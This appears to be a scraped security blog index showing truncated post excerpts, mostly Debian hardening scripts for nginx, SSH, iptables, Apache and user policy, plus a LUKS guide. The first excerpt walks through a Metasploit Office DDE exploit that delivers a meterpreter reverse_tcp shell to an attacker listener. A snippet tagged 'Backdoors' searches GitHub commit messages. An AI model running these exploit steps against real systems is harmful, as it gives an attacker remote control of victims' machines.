Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rbwget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_deliverymsfconsole reload_all use exploit/windows/dde_delivery Set the sever host set SRVHOST 192.168.1.10set SRVHOST 192.168.1.10 Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 443 exploitset PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 …

Hardening, nginx

Nginx Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team Hide nginx version sed -i "s/# server_tokens off;/server_tokens off;/g" /etc/nginx/nginx.confsed -i "s/# server_tokens off;/server_tokens off;/g" /etc/nginx/nginx.conf Remove ETags sed -i ‘s/server_tokens off;/server_tokens off;\netag off;/’ /etc/nginx/nginx.confsed -i ‘s/server_tokens off;/server_tokens off;\netag off;/’ /etc/nginx/nginx.conf Remove default page echo "" > /var/www/html/index.htmlecho "" > /var/www/html/index.html Use strong cipher suites sed -i "s/ssl_prefer_server_ciphers on;/ssl_prefer_server_ciphers on;\nssl_ciphers …

Hardening, OpenSSH

SSH Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team Set /etc/ssh/sshd_config ownership and access permissions chown root:root /etc/ssh/sshd_config chmod 600 /etc/ssh/sshd_configchown root:root /etc/ssh/sshd_config chmod 600 /etc/ssh/sshd_config Change Port sed -i "s/#Port 22/Port 62111/g" /etc/ssh/sshd_configsed -i "s/#Port 22/Port 62111/g" /etc/ssh/sshd_config Use Protocol 2 echo "Protocol 2" >> /etc/ssh/sshd_configecho "Protocol 2" >> /etc/ssh/sshd_config Set SSH LogLevel to INFO sed -i "/LogLevel.*/s/^#//g" …

Hardening, Network

Network Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team Disable IP forwarding sed -i "s/#net.ipv4.ip_forward=1/net.ipv4.ip_forward=0/" /etc/sysctl.conf sysctl -w net.ipv4.ip_forward=0sed -i "s/#net.ipv4.ip_forward=1/net.ipv4.ip_forward=0/" /etc/sysctl.conf sysctl -w net.ipv4.ip_forward=0 Disable packet redirect sending sed -i "/net.ipv4.conf.all.send_redirects.*/s/^#//g" /etc/sysctl.conf echo "net.ipv4.conf.default.send_redirects=0" >> /etc/sysctl.conf sysctl -w net.ipv4.conf.all.send_redirects=0 sysctl -w net.ipv4.conf.default.send_redirects=0sed -i "/net.ipv4.conf.all.send_redirects.*/s/^#//g" /etc/sysctl.conf echo "net.ipv4.conf.default.send_redirects=0" >> /etc/sysctl.conf sysctl -w net.ipv4.conf.all.send_redirects=0 sysctl -w net.ipv4.conf.default.send_redirects=0 Disable source routed …

Hardening, IPTables

Basic iptables security script

Tested on Debian 9.x https://github.com/maldevel/blue-team Install iptables apt -y install iptablesapt -y install iptables Install iptables-persistent apt -y install iptables-persistent systemctl enable netfilter-persistentapt -y install iptables-persistent systemctl enable netfilter-persistent Flush/Delete firewall rules iptables -F iptables -X iptables -Ziptables -F iptables -X iptables -Z Î’lock null packets (DoS) iptables -A INPUT -p tcp –tcp-flags ALL NONE …

Hardening, Linux

Linux Users Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team Set Maximum number of days a password may be used sed -i "s/^PASS_MAX_DAYS.*/PASS_MAX_DAYS 90/" /etc/login.defssed -i "s/^PASS_MAX_DAYS.*/PASS_MAX_DAYS 90/" /etc/login.defs Set Minimum number of days allowed between password changes to 5 sed -i "s/^PASS_MIN_DAYS.*/PASS_MIN_DAYS 5/" /etc/login.defssed -i "s/^PASS_MIN_DAYS.*/PASS_MIN_DAYS 5/" /etc/login.defs Set Number of days warning given before a password expires sed …

Apache, Hardening

Apache Web Server Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team Become root sudo su -sudo su – Hide Apache2 version echo "ServerSignature Off" >> /etc/apache2/apache2.conf echo "ServerTokens Prod" >> /etc/apache2/apache2.confecho "ServerSignature Off" >> /etc/apache2/apache2.conf echo "ServerTokens Prod" >> /etc/apache2/apache2.conf Remove ETags echo "FileETag None" >> /etc/apache2/apache2.confecho "FileETag None" >> /etc/apache2/apache2.conf Disable Directory Browsing a2dismod -f autoindexa2dismod -f autoindex Remove default …

Encryption, LUKS

Create an encrypted file container in Linux

Installations sudo apt-get install cryptsetupsudo apt-get install cryptsetup Create an empty file with the size of your container (e.g. 100MB) fallocate -l 100M mycontainer.imgfallocate -l 100M mycontainer.img or dd if=/dev/urandom of=mycontainer.img bs=1M count=100dd if=/dev/urandom of=mycontainer.img bs=1M count=100 Using a keyfile dd if=/dev/urandom of=mykey.key bs=1024 count=1dd if=/dev/urandom of=mykey.key bs=1024 count=1 Encrypting disk image file sudo cryptsetup …

Backdoors, Git, Github, Python

Github APIv3 python wrapper

pygithub3 is a Github APIv3 python wrapper. Search in commits message from pygithub3 import Github   gh = Github(token=access_token, user=username, repo=myrepo) commits=[] commits = gh.repos.commits.list().all() for c in commits: if ‘blahblah’ == c.commit.message: passfrom pygithub3 import Github gh = Github(token=access_token, user=username, repo=myrepo) commits=[] commits = gh.repos.commits.list().all() for c in commits: if ‘blahblah’ == c.commit.message: pass …